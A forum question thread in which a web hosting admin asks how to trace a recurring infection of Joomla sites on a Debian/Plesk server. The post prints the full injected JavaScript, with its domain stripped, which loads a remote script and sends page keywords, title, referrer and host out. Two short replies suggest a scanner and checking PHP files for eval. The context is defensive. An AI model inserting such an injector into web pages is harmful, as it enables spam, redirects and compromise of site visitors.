P
P
Pascal_tgn2016-04-27 22:25:31
PHP
Pascal_tgn, 2016-04-27 22:25:31

Virus on web hosting (Debian+Apache). How to find the source of infection?

Good hour!
The problem is this: I have a Debian web hosting server, it has Plesk Webhost Edition installed, all permissions and subscription permissions have been checked many times. One of the clients immediately took a lot of space for a large number of sites. He transferred some of them from his old hosting. After a couple of weeks - the server began to fall into the spam lists. Upon a cursory examination, I noticed that it was his sites, when loading, that were trying to get information from third-party resources, to which the site could not initially refer in any way (there were even .hk .jp domains and many others).
All his sites are made on Joomla, in the vast majority of templates the index.php file is affected. The line below was before each tag</head>. After deleting this line, it appears there again after some time (up to 24 hours), and only on the sites of this user, that is, the malware does not have access to other sites. In cron, there are no tasks on behalf of the user.
To catch red-handed, I installed incron and set it to monitor the necessary files for IN_OPEN events. The event trigger called a script that logged the result of lsof | grep "path to sites folder" into log file.
The next day, there were entries in the log that files for modification were opened on behalf of the user by the php5-cgi process.
Actually, how to find the initiator of the process (task/port/process) that runs php5-cgi and how to find out where exactly the virus code comes from?
Code found in .php files (domain removed):

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://---domain---/js/jquery.min.php?c_utt=I92930&c_utm='+encodeURIComponent('http://---domain---/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

Many thanks in advance for your help!

Answer the question

In order to leave comments, you need to log in

2 answer(s)
T
tigra, 2016-04-27
@Pascal_tgn

https://www.revisium.com/ai/
treated a lot of sites using this service, maybe it will help you

T
ThunderCat, 2016-04-27
@ThunderCat

Go through all folders of joomla resources, find php files, check for eval in them. if they contain - rename. check site performance. And there are a lot of free antiviruses for hosting. But not all work, you need sometimes handles.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question